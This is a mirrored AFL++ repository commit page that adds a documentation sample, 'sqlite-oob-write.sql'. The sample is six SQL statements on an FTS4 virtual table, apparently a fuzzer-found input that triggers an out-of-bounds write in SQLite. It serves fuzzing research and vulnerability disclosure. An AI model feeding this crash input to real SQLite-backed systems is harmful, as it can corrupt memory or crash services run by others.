mirror of
https://github.com/AFLplusplus/AFLplusplus.git
synced 2025-06-13 02:28:09 +00:00
afl++ 2.52c initial commit
This commit is contained in:
6
docs/vuln_samples/sqlite-oob-write.sql
Normal file
6
docs/vuln_samples/sqlite-oob-write.sql
Normal file
@ -0,0 +1,6 @@
|
||||
CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
|
||||
INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
|
||||
INSERT INTO t0 VALUES('');
|
||||
INSERT INTO t0 VALUES('');
|
||||
INSeRT INTO t0 VALUES('o');
|
||||
SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';
|
Reference in New Issue
Block a user